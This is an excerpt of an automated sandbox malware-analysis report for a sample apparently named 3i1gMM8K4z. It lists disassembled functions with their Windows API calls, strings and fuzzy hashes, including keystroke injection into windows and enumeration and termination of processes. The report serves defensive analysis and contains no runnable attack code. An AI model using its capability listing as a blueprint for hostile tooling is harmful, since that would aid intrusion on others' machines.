                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F1C370
                                                                                                                            • DestroyIcon.USER32(00000000), ref: 00F1C37F
                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F1C39C
                                                                                                                            • DestroyIcon.USER32(?), ref: 00F1C3AB
                                                                                                                              • Part of subcall function 00F6A4AF: DeleteObject.GDI32(00000000), ref: 00F6A4E8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2819616528-0
                                                                                                                            • Opcode ID: 8cc618cf0d3fd282463c0123f307df5332161dbe7faf87ab9dd32c857fd24bd3
                                                                                                                            • Instruction ID: 82218b2e4562bc2929c39ace7aef59d72da477b23233b5680c187fc305af18af
                                                                                                                            • Opcode Fuzzy Hash: 8cc618cf0d3fd282463c0123f307df5332161dbe7faf87ab9dd32c857fd24bd3
                                                                                                                            • Instruction Fuzzy Hash: 90515E70A40249AFDB20DF65DC45FAA77A9FB44720F10452CFA52A72A0D7B0AD90EB90
                                                                                                                            Function 00F3966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3A84C
                                                                                                                              • Part of subcall function 00F3A82C: GetCurrentThreadId.KERNEL32 ref: 00F3A853
                                                                                                                              • Part of subcall function 00F3A82C: AttachThreadInput.USER32(00000000,?,00F39683,?,00000001), ref: 00F3A85A
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F3968E
                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F396AB
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F396AE
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F396B7
                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F396D5
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F396D8
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F396E1
                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F396F8
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F396FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2014098862-0
                                                                                                                            • Opcode ID: d96223ceb9198af0d05da01ac24e9466e98fda4796e4eb5ef07ef7912bf43f56
                                                                                                                            • Instruction ID: d353d35b7e9ffcd7484a89451b6c5573609af7c07e1e4f74669991a308da7c1b
                                                                                                                            • Opcode Fuzzy Hash: d96223ceb9198af0d05da01ac24e9466e98fda4796e4eb5ef07ef7912bf43f56
                                                                                                                            • Instruction Fuzzy Hash: 7F11E1B1910218BEF6106F61EC8AF6A3B2DEB4C7A0F100425F254AB0A1C9F35C10EAA4
                                                                                                                            Function 00F38921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F3853C,00000B00,?,?), ref: 00F3892A
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00F3853C,00000B00,?,?), ref: 00F38931
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F3853C,00000B00,?,?), ref: 00F38946
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00F3853C,00000B00,?,?), ref: 00F3894E
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00F3853C,00000B00,?,?), ref: 00F38951
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F3853C,00000B00,?,?), ref: 00F38961
                                                                                                                            • GetCurrentProcess.KERNEL32(00F3853C,00000000,?,00F3853C,00000B00,?,?), ref: 00F38969
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00F3853C,00000B00,?,?), ref: 00F3896C
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00F38992,00000000,00000000,00000000), ref: 00F38986
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1957940570-0
                                                                                                                            • Opcode ID: 3b345b0fcfccd4fd0bd969d826789b8a1607176f99d2fc2ce4b41c8d7123db68
                                                                                                                            • Instruction ID: 60a6985bf173d4dc3d028f2d1afc4a404159990406c798771035d02a90b01314
                                                                                                                            • Opcode Fuzzy Hash: 3b345b0fcfccd4fd0bd969d826789b8a1607176f99d2fc2ce4b41c8d7123db68
                                                                                                                            • Instruction Fuzzy Hash: 7F01BF75240348FFE710ABA5EC4DF673B6CEB89751F404421FA15DB191CAB59804EB21
                                                                                                                            Function 00F59B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                            • API String ID: 0-572801152
                                                                                                                            • Opcode ID: 5602865f51a8116179084442b421ec6bdc663bc646f1369c6d01d03809d38025
                                                                                                                            • Instruction ID: 5af0150877aa5124159d75b22453d9604a598d0a7e68054c702d06cc3f6a9150
                                                                                                                            • Opcode Fuzzy Hash: 5602865f51a8116179084442b421ec6bdc663bc646f1369c6d01d03809d38025
                                                                                                                            • Instruction Fuzzy Hash: A6C1A371E0420ADBDF14DF58D885BAEB7F5FB48315F148429EE05AB280E7B09D49DB60
                                                                                                                            Function 00F59113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$_memset
                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                            • API String ID: 2862541840-625585964
                                                                                                                            • Opcode ID: 273af6bdd01429a0636391edafb878072e04681c08b77b206cc7d161a63ee6b7
                                                                                                                            • Instruction ID: 1cf902a099d04a0e6a7ba1fdf3f02da6d0beb7fa5533fbf7626e22d1efbb7870
                                                                                                                            • Opcode Fuzzy Hash: 273af6bdd01429a0636391edafb878072e04681c08b77b206cc7d161a63ee6b7
                                                                                                                            • Instruction Fuzzy Hash: 8091B571D04215EBDF28DF91CC48F9E77B8EF45721F108159FA15AB280D7B09909DBA0
                                                                                                                            Function 00F5975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?,?,00F37455), ref: 00F37127
                                                                                                                              • Part of subcall function 00F3710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37142
                                                                                                                              • Part of subcall function 00F3710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37150
                                                                                                                              • Part of subcall function 00F3710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?), ref: 00F37160
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F59806
                                                                                                                            • _memset.LIBCMT ref: 00F59813
                                                                                                                            • _memset.LIBCMT ref: 00F59956
                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F59982
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00F5998D
                                                                                                                            Strings
                                                                                                                            • NULL Pointer assignment, xrefs: 00F599DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                            • API String ID: 1300414916-2785691316
                                                                                                                            • Opcode ID: 9f1b54033462f733c6aac4db60dfaffa516fa8fb42d2afbfee8fdf3f5bfed90f
                                                                                                                            • Instruction ID: c66ccd020e32d024090d4ddcc719d3c7da691200dff0db27f7f1d79fd4a26f02
                                                                                                                            • Opcode Fuzzy Hash: 9f1b54033462f733c6aac4db60dfaffa516fa8fb42d2afbfee8fdf3f5bfed90f
                                                                                                                            • Instruction Fuzzy Hash: FB914871D0421DEBDB14DFA5DC44EDEBBB9AF08310F10415AF919A7281DB719A48DFA0
                                                                                                                            Function 00F66D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F66E24
                                                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F66E38
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F66E52
                                                                                                                            • _wcscat.LIBCMT ref: 00F66EAD
                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F66EC4
                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F66EF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window_wcscat
                                                                                                                            • String ID: SysListView32
                                                                                                                            • API String ID: 307300125-78025650
                                                                                                                            • Opcode ID: 8c20add1701bdc0c645499882604fb06fee348d088463dd6712c74edc98342ff
                                                                                                                            • Instruction ID: b41cc074ea7652a0c95ece235db3e969972d43ad793b84324d9446d64bf25327
                                                                                                                            • Opcode Fuzzy Hash: 8c20add1701bdc0c645499882604fb06fee348d088463dd6712c74edc98342ff
                                                                                                                            • Instruction Fuzzy Hash: 5341B271A00348ABEF21DF64CC85BEEB7E8EF08360F10042AF554E7291D6729D84EB60
                                                                                                                            Function 00F5E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F43C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F43C7A
                                                                                                                              • Part of subcall function 00F43C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F43C88
                                                                                                                              • Part of subcall function 00F43C55: CloseHandle.KERNEL32(00000000), ref: 00F43D52
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F5E9A4
                                                                                                                            • GetLastError.KERNEL32 ref: 00F5E9B7
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F5E9E6
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F5EA63
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00F5EA6E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F5EAA3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                            • Opcode ID: 65705abf9a95a1db5cd33ef0273616beacdbfdbc90cb535105db7dbb4f0f32d7
                                                                                                                            • Instruction ID: c7008a859f85d60c26106cb3f8cb2b54ea23e816ecbf28591d9a71bf01886d31
                                                                                                                            • Opcode Fuzzy Hash: 65705abf9a95a1db5cd33ef0273616beacdbfdbc90cb535105db7dbb4f0f32d7
                                                                                                                            • Instruction Fuzzy Hash: 0A41B1716002059FDB18EF24DC95F6DB7E5AF40324F188418FA429B3D3CBB9A908EB95
                                                                                                                            Function 00F42F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00F43033
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoad
                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                            • Opcode ID: 50e5a218f24ccc3b8bd41b22c15e95711e6fbd21711153a4db9d9e0a1412c0b0
                                                                                                                            • Instruction ID: 190ad590d800d94b14836329d2774a9da9397dfb6e262c7660b1f4e16e472dba
                                                                                                                            • Opcode Fuzzy Hash: 50e5a218f24ccc3b8bd41b22c15e95711e6fbd21711153a4db9d9e0a1412c0b0
                                                                                                                            • Instruction Fuzzy Hash: 09112B32788346BEFB549A18DC42D6B7F9C9F16374B20012AFD00A61C1DBB59F4475A1
                                                                                                                            Function 00F442F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F44312
                                                                                                                            • LoadStringW.USER32(00000000), ref: 00F44319
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F4432F
                                                                                                                            • LoadStringW.USER32(00000000), ref: 00F44336
                                                                                                                            • _wprintf.LIBCMT ref: 00F4435C
                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F4437A
                                                                                                                            Strings
                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00F44357
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                            • API String ID: 3648134473-3128320259
                                                                                                                            • Opcode ID: e5309db0dfb6b640060318ed11c8bb502b93fd157ff0e8f8ac498de84ffad3c0
                                                                                                                            • Instruction ID: fae53ebb79aa8a5a7e63a628f7d6ac1c9df58a63dacbeecdea8030879235ba7a
                                                                                                                            • Opcode Fuzzy Hash: e5309db0dfb6b640060318ed11c8bb502b93fd157ff0e8f8ac498de84ffad3c0
                                                                                                                            • Instruction Fuzzy Hash: 240167F290420CBFE7119B90ED89FF6776CE709700F4005A1FB55E2051EAB55E896B71
                                                                                                                            Function 00F6D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F6D47C
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F6D49C
                                                                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F6D6D7
                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F6D6F5
                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F6D716
                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00F6D735
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F6D75A
                                                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F6D77D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1211466189-0
                                                                                                                            • Opcode ID: 3a992ed2e1d9ddc701983a67e4947cdbe1eeaaa849ce83f5e858f39936e1621a
                                                                                                                            • Instruction ID: 906b24fd5eda7a3fbba24968d4d84afc7d8c68e3e172b445aed0ae13d0224d30
                                                                                                                            • Opcode Fuzzy Hash: 3a992ed2e1d9ddc701983a67e4947cdbe1eeaaa849ce83f5e858f39936e1621a
                                                                                                                            • Instruction Fuzzy Hash: 78B1BA71A00229EFDF14CF68C9847AD3BB1BF04710F088069EC589B295D775AD50EBA0
                                                                                                                            Function 00EE2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000), ref: 00EE2ACF
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00EE2B17
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000), ref: 00F1C21A
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000), ref: 00F1C286
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ShowWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1268545403-0
                                                                                                                            • Opcode ID: bb2976630464cb81e8182af7f21e2c4ccce0619b4a9eb89536a0d3ec674b88a5
                                                                                                                            • Instruction ID: 045002fda076c26b932b5feb91d640c0be8fea25f4393ce23424ce1877e02659
                                                                                                                            • Opcode Fuzzy Hash: bb2976630464cb81e8182af7f21e2c4ccce0619b4a9eb89536a0d3ec674b88a5
                                                                                                                            • Instruction Fuzzy Hash: 87416C316087CC9BC7358F6ADC88BBB3B99BB45314F18A83DE24BA2560C67598C5E750
                                                                                                                            Function 00F470C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F470DD
                                                                                                                              • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                              • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F47114
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00F47130
                                                                                                                            • _memmove.LIBCMT ref: 00F4717E
                                                                                                                            • _memmove.LIBCMT ref: 00F4719B
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00F471AA
                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F471BF
